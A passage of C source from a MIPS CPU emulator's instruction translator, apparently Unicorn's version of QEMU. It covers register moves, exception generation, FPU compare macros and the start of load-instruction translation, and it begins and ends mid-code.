*tcg_ctx, TCGv t, int reg) { if (reg == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->cpu_gpr[reg]); } } static inline void gen_store_gpr(TCGContext *tcg_ctx, TCGv t, int reg) { if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], t); } } /* Moves to/from shadow registers. */ static inline void gen_load_srsgpr(TCGContext *tcg_ctx, int from, int to) { TCGv t0 = tcg_temp_new(tcg_ctx); if (from == 0) { tcg_gen_movi_tl(tcg_ctx, t0, 0); } else { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); tcg_gen_ld_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * from); tcg_temp_free_ptr(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t2); } gen_store_gpr(tcg_ctx, t0, to); tcg_temp_free(tcg_ctx, t0); } static inline void gen_store_srsgpr(TCGContext *tcg_ctx, int from, int to) { if (to != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); gen_load_gpr(tcg_ctx, t0, from); tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); tcg_gen_st_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * to); tcg_temp_free_ptr(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t0); } } #if !defined(TARGET_MIPS64) /* MXU General purpose registers moves. */ static inline void gen_load_mxu_gpr(TCGContext *tcg_ctx, TCGv t, unsigned int reg) { if (reg == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else if (reg <= 15) { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->mxu_gpr[reg - 1]); } } static inline void gen_store_mxu_gpr(TCGContext *tcg_ctx, TCGv t, unsigned int reg) { if (reg > 0 && reg <= 15) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->mxu_gpr[reg - 1], t); } } /* MXU control register moves. */ static inline void gen_load_mxu_cr(TCGContext *tcg_ctx, TCGv t) { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->mxu_CR); } static inline void gen_store_mxu_cr(TCGContext *tcg_ctx, TCGv t) { /* TODO: Add handling of RW rules for MXU_CR. 
*/ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->mxu_CR, t); } #endif /* Tests */ static inline void gen_save_pc(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); } static inline void save_cpu_state(DisasContext *ctx, int do_save_pc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; LOG_DISAS("hflags %08x saved %08x\n", ctx->hflags, ctx->saved_hflags); if (do_save_pc && ctx->base.pc_next != ctx->saved_pc) { gen_save_pc(tcg_ctx, ctx->base.pc_next); ctx->saved_pc = ctx->base.pc_next; } if (ctx->hflags != ctx->saved_hflags) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags); ctx->saved_hflags = ctx->hflags; switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_BR: break; case MIPS_HFLAG_BC: case MIPS_HFLAG_BL: case MIPS_HFLAG_B: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->btarget, ctx->btarget); break; } } } static inline void restore_cpu_state(CPUMIPSState *env, DisasContext *ctx) { ctx->saved_hflags = ctx->hflags; switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_BR: break; case MIPS_HFLAG_BC: case MIPS_HFLAG_BL: case MIPS_HFLAG_B: ctx->btarget = env->btarget; break; } } static inline void generate_exception_err(DisasContext *ctx, int excp, int err) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 texcp = tcg_const_i32(tcg_ctx, excp); TCGv_i32 terr = tcg_const_i32(tcg_ctx, err); save_cpu_state(ctx, 1); gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, texcp, terr); tcg_temp_free_i32(tcg_ctx, terr); tcg_temp_free_i32(tcg_ctx, texcp); ctx->base.is_jmp = DISAS_NORETURN; } static inline void generate_exception(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_0e0i(raise_exception, excp); } static inline void generate_exception_end(DisasContext *ctx, int excp) { generate_exception_err(ctx, excp, 0); } /* Floating point register moves. 
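 * Each 32-bit FPR is modeled as half of the corresponding 64-bit
 * fpu_f64 element: gen_load_fpr32/gen_store_fpr32 operate on bits
 * 0..31 and the *_fpr32h variants on bits 32..63, so the FR=0
 * even/odd pairing and the FR=1 flat register file share one backing
 * array.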
*/ static void gen_load_fpr32(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_FRE) { generate_exception(ctx, EXCP_RI); } tcg_gen_extrl_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } static void gen_store_fpr32(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t64; if (ctx->hflags & MIPS_HFLAG_FRE) { generate_exception(ctx, EXCP_RI); } t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t64, t); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 0, 32); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_load_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_extrh_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } else { gen_load_fpr32(ctx, t, reg | 1); } } static void gen_store_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t64, t); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 32, 32); tcg_temp_free_i64(tcg_ctx, t64); } else { gen_store_fpr32(ctx, t, reg | 1); } } static void gen_load_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_mov_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } else { tcg_gen_concat32_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg | 1]); } } static void gen_store_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], t); } else { TCGv_i64 t0; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg & ~1], t, 0, 32); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, t, 32); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg | 1], tcg_ctx->fpu_f64[reg | 1], t0, 0, 32); tcg_temp_free_i64(tcg_ctx, t0); } } static inline int get_fp_bit(int cc) { if (cc) { return 24 + cc; } else { return 23; } } /* Addresses computation */ static inline void gen_op_addr_add(DisasContext *ctx, TCGv ret, TCGv arg0, TCGv arg1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_add_tl(tcg_ctx, ret, arg0, arg1); #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { tcg_gen_ext32s_i64(tcg_ctx, ret, ret); } #endif } static inline void gen_op_addr_addi(DisasContext *ctx, TCGv ret, TCGv base, target_long ofs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, ret, base, ofs); #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { tcg_gen_ext32s_i64(tcg_ctx, ret, ret); } #endif } /* Addresses computation (translation time) */ static target_long addr_add(DisasContext *ctx, target_long base, target_long offset) { target_long sum = base + offset; #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { sum = (int32_t)sum; } #endif return sum; } /* Sign-extract the low 32-bits to a target_long. */ static inline void gen_move_low32(TCGContext *tcg_ctx, TCGv ret, TCGv_i64 arg) { #if defined(TARGET_MIPS64) tcg_gen_ext32s_i64(tcg_ctx, ret, arg); #else tcg_gen_extrl_i64_i32(tcg_ctx, ret, arg); #endif } /* Sign-extract the high 32-bits to a target_long. 
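 * On a 64-bit target this is an arithmetic right shift by 32; on a
 * 32-bit target, target_long is itself 32 bits wide, so the high half
 * is extracted directly with extrh.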
*/
static inline void gen_move_high32(TCGContext *tcg_ctx, TCGv ret, TCGv_i64 arg)
{
#if defined(TARGET_MIPS64)
    tcg_gen_sari_i64(tcg_ctx, ret, arg, 32);
#else
    tcg_gen_extrh_i64_i32(tcg_ctx, ret, arg);
#endif
}

static inline void check_cp0_enabled(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0))) {
        generate_exception_err(ctx, EXCP_CpU, 0);
    }
}

static inline void check_cp1_enabled(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_FPU))) {
        generate_exception_err(ctx, EXCP_CpU, 1);
    }
}

/*
 * Verify that the processor is running with COP1X instructions enabled.
 * This is associated with the nabla symbol in the MIPS32 and MIPS64
 * opcode tables.
 */
static inline void check_cop1x(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_COP1X))) {
        generate_exception_end(ctx, EXCP_RI);
    }
}

/*
 * Verify that the processor is running with 64-bit floating-point
 * operations enabled.
 */
static inline void check_cp1_64bitmode(DisasContext *ctx)
{
    if (unlikely(~ctx->hflags & (MIPS_HFLAG_F64 | MIPS_HFLAG_COP1X))) {
        generate_exception_end(ctx, EXCP_RI);
    }
}

/*
 * Verify that the floating point register is valid; an operation is not
 * defined if bit 0 of any register specification is set and the FR bit in
 * the Status register equals zero, since the register numbers specify an
 * even-odd pair of adjacent coprocessor general registers. When the FR bit
 * in the Status register equals one, both even and odd register numbers
 * are valid. This limitation exists only for 64 bit wide (d,l,ps) registers.
 *
 * Multiple 64 bit wide registers can be checked by calling
 * check_cp1_registers(ctx, freg1 | freg2 | ... | fregN);
 */
static inline void check_cp1_registers(DisasContext *ctx, int regs)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_F64) && (regs & 1))) {
        generate_exception_end(ctx, EXCP_RI);
    }
}

/*
 * Verify that the processor is running with DSP instructions enabled.
 * This is enabled by CP0 Status register MX(24) bit.
 */
static inline void check_dsp(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP))) {
        if (ctx->insn_flags & ASE_DSP) {
            generate_exception_end(ctx, EXCP_DSPDIS);
        } else {
            generate_exception_end(ctx, EXCP_RI);
        }
    }
}

static inline void check_dsp_r2(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP_R2))) {
        if (ctx->insn_flags & ASE_DSP) {
            generate_exception_end(ctx, EXCP_DSPDIS);
        } else {
            generate_exception_end(ctx, EXCP_RI);
        }
    }
}

static inline void check_dsp_r3(DisasContext *ctx)
{
    if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP_R3))) {
        if (ctx->insn_flags & ASE_DSP) {
            generate_exception_end(ctx, EXCP_DSPDIS);
        } else {
            generate_exception_end(ctx, EXCP_RI);
        }
    }
}

/*
 * This code generates a "reserved instruction" exception if the
 * CPU does not support the instruction set corresponding to flags.
 */
static inline void check_insn(DisasContext *ctx, uint64_t flags)
{
    if (unlikely(!(ctx->insn_flags & flags))) {
        generate_exception_end(ctx, EXCP_RI);
    }
}

/*
 * This code generates a "reserved instruction" exception if the
 * CPU has the corresponding flag set, which indicates that the
 * instruction has been removed.
 */
static inline void check_insn_opc_removed(DisasContext *ctx, uint64_t flags)
{
    if (unlikely(ctx->insn_flags & flags)) {
        generate_exception_end(ctx, EXCP_RI);
    }
}

/*
 * The Linux kernel traps certain reserved instruction exceptions to
 * emulate the corresponding instructions. QEMU is the kernel in user
 * mode, so those traps are emulated by accepting the instructions.
* * A reserved instruction exception is generated for flagged CPUs if * QEMU runs in system mode. */ static inline void check_insn_opc_user_only(DisasContext *ctx, uint64_t flags) { check_insn_opc_removed(ctx, flags); } /* * This code generates a "reserved instruction" exception if the * CPU does not support 64-bit paired-single (PS) floating point data type. */ static inline void check_ps(DisasContext *ctx) { if (unlikely(!ctx->ps)) { generate_exception(ctx, EXCP_RI); } check_cp1_64bitmode(ctx); } #ifdef TARGET_MIPS64 /* * This code generates a "reserved instruction" exception if 64-bit * instructions are not enabled. */ static inline void check_mips_64(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_64))) { generate_exception_end(ctx, EXCP_RI); } } #endif static inline void check_mvh(DisasContext *ctx) { if (unlikely(!ctx->mvh)) { generate_exception(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 XNP bit is set. */ static inline void check_xnp(DisasContext *ctx) { if (unlikely(ctx->CP0_Config5 & (1 << CP0C5_XNP))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config3 PW bit is NOT set. */ static inline void check_pw(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_PW)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config3 MT bit is NOT set. */ static inline void check_mt(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_MT)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "coprocessor unusable" exception if CP0 is not * available, and, if that is not the case, generates a "reserved instruction" * exception if the Config5 MT bit is NOT set. This is needed for availability * control of some of MT ASE instructions. */ static inline void check_cp0_mt(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0))) { generate_exception_err(ctx, EXCP_CpU, 0); } else { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_MT)))) { generate_exception_err(ctx, EXCP_RI, 0); } } } /* * This code generates a "reserved instruction" exception if the * Config5 NMS bit is set. */ static inline void check_nms(DisasContext *ctx) { if (unlikely(ctx->CP0_Config5 & (1 << CP0C5_NMS))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 NMS bit is set, and Config1 DL, Config1 IL, Config2 SL, * Config2 TL, and Config5 L2C are unset. */ static inline void check_nms_dl_il_sl_tl_l2c(DisasContext *ctx) { if (unlikely((ctx->CP0_Config5 & (1 << CP0C5_NMS)) && !(ctx->CP0_Config1 & (1 << CP0C1_DL)) && !(ctx->CP0_Config1 & (1 << CP0C1_IL)) && !(ctx->CP0_Config2 & (1 << CP0C2_SL)) && !(ctx->CP0_Config2 & (1 << CP0C2_TL)) && !(ctx->CP0_Config5 & (1 << CP0C5_L2C)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 EVA bit is NOT set. */ static inline void check_eva(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config5 & (1 << CP0C5_EVA)))) { generate_exception_end(ctx, EXCP_RI); } } /* * Define small wrappers for gen_load_fpr* so that we have a uniform * calling interface for 32 and 64-bit FPRs. No sense in changing * all callers for gen_load_fpr32 when we need the CTX parameter for * this one use. 
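 *
 * For orientation (a sketch of the expansion, not literal preprocessor
 * output): FOP_CONDS(, 0, d, FMT_D, 64) below defines
 * gen_cmp_d(ctx, n, ft, fs, cc), which loads fs and ft into 64-bit
 * temporaries and dispatches on the condition number n (0..15) to the
 * matching helper, e.g. n == 2 ends up in the cmp_d_eq helper.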
*/ #define gen_ldcmp_fpr32(ctx, x, y) gen_load_fpr32(ctx, x, y) #define gen_ldcmp_fpr64(ctx, x, y) gen_load_fpr64(ctx, x, y) #define FOP_CONDS(type, abs, fmt, ifmt, bits) \ static inline void gen_cmp ## type ## _ ## fmt(DisasContext *ctx, int n, \ int ft, int fs, int cc) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i##bits fp0 = tcg_temp_new_i##bits(tcg_ctx); \ TCGv_i##bits fp1 = tcg_temp_new_i##bits(tcg_ctx); \ switch (ifmt) { \ case FMT_PS: \ check_ps(ctx); \ break; \ case FMT_D: \ if (abs) { \ check_cop1x(ctx); \ } \ check_cp1_registers(ctx, fs | ft); \ break; \ case FMT_S: \ if (abs) { \ check_cop1x(ctx); \ } \ break; \ } \ gen_ldcmp_fpr##bits(ctx, fp0, fs); \ gen_ldcmp_fpr##bits(ctx, fp1, ft); \ switch (n) { \ case 0: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _f, fp0, fp1, cc); \ break; \ case 1: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _un, fp0, fp1, cc); \ break; \ case 2: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _eq, fp0, fp1, cc); \ break; \ case 3: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ueq, fp0, fp1, cc); \ break; \ case 4: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _olt, fp0, fp1, cc); \ break; \ case 5: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ult, fp0, fp1, cc); \ break; \ case 6: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ole, fp0, fp1, cc); \ break; \ case 7: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ule, fp0, fp1, cc); \ break; \ case 8: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _sf, fp0, fp1, cc); \ break; \ case 9: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngle, fp0, fp1, cc); \ break; \ case 10: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _seq, fp0, fp1, cc); \ break; \ case 11: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngl, fp0, fp1, cc); \ break; \ case 12: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _lt, fp0, fp1, cc); \ break; \ case 13: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _nge, fp0, fp1, cc); \ break; \ case 14: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _le, fp0, fp1, cc); \ break; \ case 15: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngt, fp0, fp1, cc); \ break; \ default: \ abort(); \ } \ tcg_temp_free_i##bits(tcg_ctx, fp0); \ tcg_temp_free_i##bits(tcg_ctx, fp1); \ } FOP_CONDS(, 0, d, FMT_D, 64) FOP_CONDS(abs, 1, d, FMT_D, 64) FOP_CONDS(, 0, s, FMT_S, 32) FOP_CONDS(abs, 1, s, FMT_S, 32) FOP_CONDS(, 0, ps, FMT_PS, 64) FOP_CONDS(abs, 1, ps, FMT_PS, 64) #undef FOP_CONDS #define FOP_CONDNS(fmt, ifmt, bits, STORE) \ static inline void gen_r6_cmp_ ## fmt(DisasContext *ctx, int n, \ int ft, int fs, int fd) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i ## bits fp0 = tcg_temp_new_i ## bits(tcg_ctx); \ TCGv_i ## bits fp1 = tcg_temp_new_i ## bits(tcg_ctx); \ if (ifmt == FMT_D) { \ check_cp1_registers(ctx, fs | ft | fd); \ } \ gen_ldcmp_fpr ## bits(ctx, fp0, fs); \ gen_ldcmp_fpr ## bits(ctx, fp1, ft); \ switch (n) { \ case 0: \ gen_helper_r6_cmp_ ## fmt ## _af(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 1: \ gen_helper_r6_cmp_ ## fmt ## _un(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 2: \ gen_helper_r6_cmp_ ## fmt ## _eq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 3: \ gen_helper_r6_cmp_ ## fmt ## _ueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 4: \ gen_helper_r6_cmp_ ## fmt ## _lt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 5: \ gen_helper_r6_cmp_ ## fmt ## _ult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 6: \ gen_helper_r6_cmp_ ## fmt ## _le(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 7: \ 
gen_helper_r6_cmp_ ## fmt ## _ule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 8: \ gen_helper_r6_cmp_ ## fmt ## _saf(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 9: \ gen_helper_r6_cmp_ ## fmt ## _sun(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 10: \ gen_helper_r6_cmp_ ## fmt ## _seq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 11: \ gen_helper_r6_cmp_ ## fmt ## _sueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 12: \ gen_helper_r6_cmp_ ## fmt ## _slt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 13: \ gen_helper_r6_cmp_ ## fmt ## _sult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 14: \ gen_helper_r6_cmp_ ## fmt ## _sle(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 15: \ gen_helper_r6_cmp_ ## fmt ## _sule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 17: \ gen_helper_r6_cmp_ ## fmt ## _or(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 18: \ gen_helper_r6_cmp_ ## fmt ## _une(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 19: \ gen_helper_r6_cmp_ ## fmt ## _ne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 25: \ gen_helper_r6_cmp_ ## fmt ## _sor(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 26: \ gen_helper_r6_cmp_ ## fmt ## _sune(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 27: \ gen_helper_r6_cmp_ ## fmt ## _sne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ default: \ abort(); \ } \ STORE; \ tcg_temp_free_i ## bits(tcg_ctx, fp0); \ tcg_temp_free_i ## bits(tcg_ctx, fp1); \ } FOP_CONDNS(d, FMT_D, 64, gen_store_fpr64(ctx, fp0, fd)) FOP_CONDNS(s, FMT_S, 32, gen_store_fpr32(ctx, fp0, fd)) #undef FOP_CONDNS #undef gen_ldcmp_fpr32 #undef gen_ldcmp_fpr64 /* load/store instructions. */ #define OP_LD_ATOMIC(insn, fname) \ static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, int mem_idx, \ DisasContext *ctx) \ { \ gen_helper_1e1i(insn, ret, arg1, mem_idx); \ } OP_LD_ATOMIC(ll, ld32s); #if defined(TARGET_MIPS64) OP_LD_ATOMIC(lld, ld64); #endif #undef OP_LD_ATOMIC static void gen_base_offset_addr(DisasContext *ctx, TCGv addr, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (base == 0) { tcg_gen_movi_tl(tcg_ctx, addr, offset); } else if (offset == 0) { gen_load_gpr(tcg_ctx, addr, base); } else { tcg_gen_movi_tl(tcg_ctx, addr, offset); gen_op_addr_add(ctx, addr, tcg_ctx->cpu_gpr[base], addr); } } static target_ulong pc_relative_pc(DisasContext *ctx) { target_ulong pc = ctx->base.pc_next; if (ctx->hflags & MIPS_HFLAG_BMASK) { int branch_bytes = ctx->hflags & MIPS_HFLAG_BDS16 ? 2 : 4; pc -= branch_bytes; } pc &= ~(target_ulong)3; return pc; } /* Load */ static void gen_ld(DisasContext *ctx, uint32_t opc, int rt, int base, int offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2; int mem_idx = ctx->mem_idx; if (rt == 0 && ctx->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)) { /* * Loongson CPU uses a load to zero register for prefetch. * We emulate it as a NOP. On other CPU we must perform the * actual memory access. 
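 * (A load whose destination is $zero cannot change architectural
 * state, which is presumably why Loongson reuses the encoding as a
 * prefetch hint.)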
*/ return; } t0 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, base, offset); switch (opc) { #if defined(TARGET_MIPS64) case OPC_LWU: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEUL | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LD: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ | ctx->default_tcg_memop_mask); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LLD: case R6_OPC_LLD: op_ld_lld(tcg_ctx, t0, t0, mem_idx, ctx); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDL: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); #ifndef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); tcg_gen_shl_tl(tcg_ctx, t0, t0, t1); t2 = tcg_const_tl(tcg_ctx, -1); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDR: t1 = tcg_temp_new(tcg_ctx); /* * Do a byte access to possibly trigger a page * fault with the unaligned address. */ tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, t1, t0, 7); #ifdef TARGET_WORDS_BIGENDIAN tcg_gen_xori_tl(tcg_ctx, t1, t1, 7); #endif tcg_gen_shli_tl(tcg_ctx, t1, t1, 3); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); tcg_gen_shr_tl(tcg_ctx, t0, t0, t1); tcg_gen_xori_tl(tcg_ctx, t1, t1, 63); t2 = tcg_const_tl(tcg_ctx, 0xfffffffffffffffeull); tcg_gen_shl_tl(tcg_ctx, t2, t2, t1); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LDPC: t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); gen_op_addr_add(ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TEQ); gen_store_gpr(tcg_ctx, t0, rt); break; #endif case OPC_LWPC: t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx)); gen_op_addr_add(ctx, t0, t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_LWE: mem_idx = MIPS_HFLAG_UM; /* fall through */ case 